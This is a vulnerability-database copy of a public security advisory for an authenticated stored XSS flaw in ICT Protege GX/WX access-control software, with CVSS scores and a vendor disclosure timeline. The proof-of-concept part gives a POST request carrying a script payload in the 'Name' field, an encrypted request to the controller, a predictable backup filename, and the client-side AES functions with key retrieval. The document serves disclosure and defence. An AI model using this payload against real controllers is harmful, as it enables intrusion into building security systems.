Lucene search

K
zeroscienceGjoko KrsticZSL-2022-5699
HistoryMar 21, 2022 - 12:00 a.m.

ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability

2022-03-2100:00:00
Gjoko Krstic
zeroscience.mk
328
protege gx
protege wx
xss vulnerability
integrated control technology ltd.
cross-site scripting
web-based system
microsoft-wince/6.00
gjoko krstic

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

5.3

Confidence

High

EPSS

0.001

Percentile

22.7%

Title: ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability
Advisory ID: ZSL-2022-5699
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 21.03.2022

Summary

Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system.

Description

The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the β€˜Name’ parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Integrated Control Technology Ltd. - <https://www.ict.co>

Affected Version

GX: Ver: 2.08.1002 K1B3
Lib: 04.00.217
Int: 2.3.235.J013
OS: 2.0.20
WX: Ver: 4.00 284 H062
App: 02.08.766
Lib: 04.00.169
Int: 02.2.208

Tested On

Microsoft-WinCE/6.00

Vendor Status

[08.02.2022] Vulnerability discovered.
[08.02.2022] Vendor contacted.
[08.02.2022] Vendor responds asking if we are Certified ProtΓ©gΓ© Installers.
[08.02.2022] Replied to the vendor.
[16.02.2022] Vendor’s technical support are online for Certified ProtΓ©gΓ© Installers only.
[16.02.2022] Further explanation provided to the vendor.
[18.02.2022] Vendor suggests to contact the incumbent security system installer and work with them to get our ticket logged.
[21.03.2022] Public security advisory released.

PoC

protege_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/50835&gt;
[2] <https://packetstormsecurity.com/files/166390/&gt;
[3] <https://cxsecurity.com/issue/WLB-2022030099&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/222335&gt;
[5] <https://vulners.com/cve/CVE-2022-29734&gt;
[6] <https://nvd.nist.gov/vuln/detail/CVE-2022-29734&gt;

Changelog

[21.03.2022] - Initial release
[25.03.2022] - Added reference [1], [2], [3] and [4]
[29.05.2022] - Added reference [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability


Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.

Desc: The application suffers from an authenticated stored XSS vulnerability.
The issue is triggered when input passed to the 'Name' parameter is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site.

Tested on: Microsoft-WinCE/6.00


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5699
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php


08.02.2022

--


UI navigation:
--------------

Scheduling &gt; Daylight Savings &gt; (Name field).


Decrypted POST request:
-----------------------

POST /daylightsaving.htm

Command&amp;Type=Submit&amp;SubType=GXT_DAYLIGHTSAVINGS_TBL&amp;DaylightSavingId=1&amp;action=update&amp;Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&amp;StartMonth=10&amp;EndMonth=2&amp;StartDay=41&amp;EndDay=41&amp;RecId=1


Encrypted GET request:
----------------------

http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6


Additional info:
----------------

Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak
The D3037E8A is the serial number of the onboard reader.

Encrypt/Decrypt functions:
--------------------------

From console:
&gt; localStorage.getItem("WXKey")
&lt; '8EDB22D9FB767538'

function encryptAES(a, c) {
    a = a.toString();
    a = unescape(encodeURIComponent(a));
    "undefined" == typeof c &amp;&amp; (c = !0);
    if (0 == servertype)
        return a;
    var b = localStorage.getItem("WXKey");
    if ("" == b || null == b)
        return a;
    for (var d = "", e = 0; 16 &gt; e; e++)
        d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
    a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
    return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
}

function decryptAES(a) {
    if (null == a)
        return "";
    a = a.toString();
    if ("<invalid session=""> &lt; Packet not Init and not encrypted. &gt;" == a)
        a = 0 == servertype ? "login.php" : "login.htm",
        window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else if ("<invalid session="">" == a.substr(0, 17))
        a = 0 == servertype ? "login.php?logout" : "login.htm?logout",
        window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else {
        if (0 == servertype)
            return a;
        var c = localStorage.getItem("WXKey");
        if ("" == c)
            return a;
        a = hexToStr(a);
        var b = a.substr(0, 16);
        a = a.substr(16, a.length);
        a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
        a = removePKCS7(a);
        return a = decodeURIComponent(escape(a))
    }
</invalid></invalid></p></body></html>

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

5.3

Confidence

High

EPSS

0.001

Percentile

22.7%

Related for ZSL-2022-5699